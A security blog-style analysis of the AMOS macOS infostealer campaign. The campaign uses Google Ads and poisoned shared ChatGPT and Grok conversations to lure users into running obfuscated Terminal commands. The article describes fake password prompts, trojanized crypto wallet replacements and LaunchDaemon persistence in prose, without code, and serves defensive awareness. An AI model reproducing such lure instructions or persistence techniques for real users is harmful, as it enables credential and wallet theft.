How AMOS Infostealer Exploits AI Trust and Google Ads to Target macOS Users

Imagine searching for a quick fix to a Mac issue, clicking a Google Ad that looks like a lifeline, and landing in a ChatGPT or Grok conversation that seems to have all the answers. This is exactly how the AMOS infostealer campaign ensnares its victims—by blending technical trickery with social engineering, all while hiding in plain sight on platforms users inherently trust. Instead of the usual phishing emails, attackers are now buying Google Ads targeting popular macOS troubleshooting queries, then redirecting users to AI-generated guides that are poisoned with malicious instructions (BleepingComputer).

What makes this campaign especially insidious is its exploitation of the perceived authority of AI platforms. The attackers craft ChatGPT and Grok threads that mimic genuine tech support, guiding users step-by-step through seemingly helpful solutions. But hidden within these instructions are commands that, once executed, open the door to credential theft, cryptocurrency wallet compromise, and persistent malware on macOS systems. Security researchers from Huntress and Kaspersky have tracked the campaign’s evolution, noting its adaptability and the sophisticated use of both technical and psychological tactics (BleepingComputer).

This analysis unpacks the AMOS campaign’s methods, from its clever abuse of Google Ads and AI conversations to its technical sleight of hand and the broader implications for macOS security in 2025.

How AMOS Hijacks Trust: The Technical Tricks and Social Engineering Behind the macOS Infostealer Campaign

Leveraging Google Ads for Initial Compromise

The AMOS infostealer campaign utilizes Google Ads as a primary vector to reach unsuspecting macOS users. Threat actors purchase ad placements targeting high-traffic queries related to macOS troubleshooting, such as “how to clear data on iMac” or “free up storage on Mac.” These ads are engineered to appear above organic search results, increasing the likelihood that users seeking technical help will click on them (BleepingComputer).

Unlike traditional phishing, which often relies on email, this campaign exploits the inherent trust users place in Google’s advertising platform. The malicious ads redirect users to legitimate-looking ChatGPT or Grok conversations that have been deliberately poisoned with harmful instructions. This approach represents a significant evolution in social engineering, as it blends the credibility of Google Ads with the perceived authority of AI-driven support platforms.

Poisoning Legitimate AI Conversations

A central technical trick in the AMOS campaign is the manipulation of public LLM (Large Language Model) conversations. Attackers prepare and share ChatGPT and Grok threads that contain step-by-step guides for common macOS issues. These guides are not only plausible but also tailored to appear helpful and authoritative, mirroring the tone and structure of genuine technical support exchanges (BleepingComputer).

The malicious conversations are then indexed and promoted via Google Ads. When a user clicks through, they are presented with a sequence of commands to enter in their macOS Terminal. The social engineering here is subtle: by embedding the instructions within a contextually relevant and seemingly expert conversation, the attackers reduce suspicion and increase compliance.

Researchers at Huntress confirmed the widespread nature of this campaign, noting that multiple variations of common troubleshooting queries consistently surfaced these poisoned AI chat results. This demonstrates a deliberate and scalable approach to poisoning search results, rather than isolated incidents.

Technical Deception via Bash Scripts and Fake Prompts

Once a victim follows the AI-provided instructions, the next phase of the attack unfolds: technical deception through obfuscated bash scripts. The commands supplied in the LLM conversation typically include a base64-encoded URL, which, when decoded, fetches and executes a bash script on the victim’s machine (BleepingComputer).

This script is engineered to mimic legitimate system behavior. One of its primary tactics is to present a fake password prompt, closely resembling the standard macOS authentication dialog. This prompt is used to harvest the user’s credentials, which are then leveraged to grant the malware root-level privileges. By validating and storing the entered password, the script ensures that subsequent malicious actions—such as downloading and executing the AMOS payload—are performed with elevated permissions.

The use of a fake prompt is a classic social engineering technique, but its integration within a contextually relevant support scenario (i.e., troubleshooting macOS issues) significantly increases its effectiveness. Users are primed to expect authentication requests during system maintenance, making them less likely to question the legitimacy of the prompt.

Targeting and Replacing Cryptocurrency Wallets

A distinguishing feature of the AMOS campaign is its specific targeting of cryptocurrency wallet applications on macOS. Once installed, the malware scans the victim’s Applications folder for popular wallets such as Ledger Wallet and Trezor Suite (BleepingComputer). If these applications are detected, AMOS overwrites them with trojanized versions.

These malicious replacements are designed to mimic the original apps’ interfaces but introduce additional prompts requesting sensitive information, such as wallet seed phrases, under the guise of “security checks.” This technique exploits the trust users have in their installed applications and the expectation that security prompts are legitimate.

Beyond Ledger and Trezor, AMOS also targets wallets like Electrum, Exodus, MetaMask, Ledger Live, and Coinbase Wallet. The malware’s ability to identify and compromise a broad array of wallet applications demonstrates a high level of technical sophistication and a clear focus on monetizing stolen credentials and assets.

Persistence and Evasion Mechanisms

To maintain long-term access and evade detection, AMOS employs several advanced persistence techniques. Upon installation, the malware drops a hidden file (commonly named .helper) in the user’s home directory. It then creates a LaunchDaemon (com.finder.helper.plist) that runs a concealed AppleScript in a watchdog loop. This mechanism ensures that if the malware process is terminated, it is automatically relaunched within one second (BleepingComputer).

This approach leverages native macOS features to blend in with legitimate system processes, making manual detection and removal more challenging for average users. The use of AppleScript for process monitoring is particularly insidious, as it can operate largely unnoticed and is less likely to trigger standard antivirus alerts.

Additionally, AMOS is capable of harvesting a wide range of sensitive data, including browser cookies, saved passwords, autofill information, session tokens, and macOS Keychain entries. This comprehensive data theft further increases the campaign’s value to cybercriminals, as it enables secondary attacks such as account takeovers and identity theft.

Exploiting the Authority of AI and the Illusion of Safety

A critical social engineering component of the AMOS campaign is its exploitation of the perceived authority and safety of AI-driven platforms. Users are increasingly turning to tools like ChatGPT and Grok for technical support, trusting that the information provided is both accurate and safe. Attackers capitalize on this trust by crafting malicious conversations that are indistinguishable from legitimate support threads (BleepingComputer).

Kaspersky researchers highlighted that a simple follow-up question to ChatGPT—such as asking if the provided instructions are safe—would reveal the malicious intent. However, most users do not take this extra step, especially when the conversation appears credible and is accessed via a trusted search engine and ad platform.

This manipulation of user psychology is central to the campaign’s success. By embedding malicious instructions within the context of helpful, AI-generated advice, attackers lower users’ defenses and increase the likelihood of compliance. The campaign’s reliance on legitimate platforms for both ad delivery and content hosting further blurs the line between safe and unsafe online behavior, complicating traditional security awareness strategies.

Monetization and the Malware-as-a-Service Model

AMOS operates as a Malware-as-a-Service (MaaS), with access to the infostealer reportedly rented out at $1,000 per month. This business model lowers the barrier to entry for cybercriminals, enabling a broader range of threat actors to participate in the campaign (BleepingComputer).

The infostealer’s capabilities have evolved over time, with recent updates adding a backdoor module that allows operators to execute arbitrary commands, log keystrokes, and deploy additional payloads on infected hosts. This modularity increases the threat posed by AMOS, as it can be customized to suit the specific objectives of different criminal clients.

The campaign’s focus on monetizable data—such as cryptocurrency wallet credentials and browser session tokens—reflects a broader trend in the cybercrime ecosystem towards direct financial gain. The combination of technical sophistication, effective social engineering, and a scalable business model makes AMOS a significant threat to macOS users.

Adaptive Campaign Tactics and Ongoing Evolution

The AMOS campaign demonstrates a high degree of adaptability, with threat actors continually refining their tactics to maximize effectiveness. The deliberate poisoning of AI conversations, combined with the strategic use of Google Ads, allows attackers to reach a wide audience while minimizing the risk of early detection (BleepingComputer).

Security researchers have observed that the campaign is not limited to a single set of queries or keywords. Instead, attackers monitor trending topics and frequently asked questions within the macOS user community, updating their malicious conversations and ad placements accordingly. This dynamic approach ensures that the campaign remains relevant and continues to attract new victims.

Furthermore, the use of legitimate platforms for both ad delivery and content hosting complicates mitigation efforts. Traditional security solutions, which often rely on blacklisting known malicious domains or detecting suspicious email attachments, are less effective against this type of attack. As a result, defenders must develop new strategies to identify and block malicious content delivered through trusted channels.

User Behavior Manipulation and the Psychology of Compliance

A nuanced aspect of the AMOS campaign is its deep understanding of user behavior and the psychology of compliance. By presenting malicious instructions within the context of a helpful AI conversation, attackers exploit users’ natural inclination to trust authoritative sources and follow step-by-step guidance when troubleshooting technical issues (BleepingComputer).

The campaign leverages several psychological principles, including:

• Authority Bias: Users are more likely to trust and act on instructions provided by perceived experts, such as AI platforms or technical support forums.
• Urgency and Problem-Solving: The context of resolving a technical issue creates a sense of urgency, reducing the likelihood that users will critically evaluate the instructions before executing them.
• Consistency and Social Proof: The use of public, indexed conversations gives the impression that the advice has been vetted and endorsed by others, further lowering users’ defenses.

These factors combine to create a highly effective social engineering environment, where users are guided step-by-step towards compromising their own systems without realizing the risk.

Defensive Gaps and the Challenge of Detection

The AMOS campaign exposes significant gaps in current defensive strategies for macOS users. The use of legitimate platforms for both initial compromise (Google Ads) and content delivery (ChatGPT, Grok) allows attackers to bypass many traditional security controls (BleepingComputer).

Standard endpoint protection solutions may fail to detect the initial stages of the attack, as the commands executed by users appear legitimate and are delivered through trusted channels. The use of obfuscated scripts and native macOS persistence mechanisms further complicates detection and remediation.

Moreover, the campaign’s reliance on user-driven execution—requiring victims to manually enter commands—means that even advanced behavioral analytics may not flag the activity as suspicious until after the system has been compromised. This highlights the need for enhanced user education and the development of new technical controls capable of identifying and blocking malicious content delivered via unconventional vectors.

The Role of Community Reporting and Threat Intelligence

The discovery and analysis of the AMOS campaign were made possible by the collaborative efforts of cybersecurity researchers and threat intelligence platforms. Companies like Kaspersky and Huntress played a critical role in identifying the poisoned AI conversations, analyzing the technical details of the malware, and raising public awareness of the threat (BleepingComputer).

Community reporting is essential for tracking the evolution of such campaigns, as attackers continually adapt their tactics to evade detection. The sharing of indicators of compromise (IOCs), detailed technical analyses, and best practices for mitigation enables defenders to respond more effectively to emerging threats.

The AMOS campaign underscores the importance of cross-industry collaboration and the need for ongoing vigilance in the face of increasingly sophisticated social engineering and technical deception tactics targeting macOS users.

Final Thoughts

The AMOS campaign is a wake-up call for anyone who relies on search engines and AI-driven platforms for technical support. By weaponizing trust in Google Ads and AI conversations, attackers have found a way to sidestep traditional security controls and exploit human psychology at scale (BleepingComputer). The campaign’s focus on cryptocurrency wallets and its Malware-as-a-Service model show just how quickly cybercrime can adapt to new technologies and user behaviors.

For defenders, the challenge is clear: old-school detection methods aren’t enough when threats are delivered through trusted channels and disguised as helpful advice. Community reporting, threat intelligence sharing, and user education are more critical than ever. As AI and search platforms continue to shape how we seek help online, staying vigilant and questioning even the most authoritative-seeming guidance is essential for keeping our digital lives secure.

References

• BleepingComputer. (2024). Google Ads for Shared ChatGPT, Grok Guides Push macOS Infostealer Malware. https://www.bleepingcomputer.com/news/security/google-ads-for-shared-chatgpt-grok-guides-push-macos-infostealer-malware/